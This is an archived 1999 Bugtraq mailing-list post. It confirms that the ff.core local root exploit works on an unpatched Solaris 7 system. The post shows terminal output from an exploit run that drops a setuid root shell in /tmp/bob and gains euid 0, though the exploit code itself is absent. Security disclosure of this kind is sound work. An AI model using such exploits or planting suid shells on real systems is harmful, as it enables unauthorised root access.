[9012] in bugtraq
ff.core exploit on Solaris (2.)7
daemon@ATHENA.MIT.EDU (Daniel J. Frasnelli)
Sat Jan 9 15:38:18 1999
Date: Fri, 8 Jan 1999 12:43:20 -0500
Reply-To: "Daniel J. Frasnelli" <dfrasnel@CSEE.WVU.EDU>
From: "Daniel J. Frasnelli" <dfrasnel@CSEE.WVU.EDU>
X-To: John McDonald <jmcdonal@UNF.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.OSF.4.05.9901070946310.11222-100000@osprey.unf.edu>
Greetings,
Confirmed ff.core exploit does exist in Solaris 7, server
edition. System is straight installation, no patches of any category
available for 7 from Sunsolve yet.
Daniel
(12:32,99-01-08)
(dfrasnel@rogue)[~]> uname -spr
SunOS 5.7 sparc
(12:34,99-01-08)
(dfrasnel@rogue)[~]> ./test
Testing if exploit is possible...
Test successful. Proceeding...
Backing up clobbered files to /tmp/.bk
Doing sploit...
Done with sploit. Testing and trying to clean up now...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Connection closed by foreign host.
w00p! Should have a suid root sh in /tmp/bob
btw, its rksh because solaris is silly
Let me try to clean up my mess...
everything should be cool.. i think :>
# ls -la /tmp/bob
-rwsr-xr-x 1 root root 192764 Jan 8 12:32 /tmp/bob
# id
(snip) euid=0(root)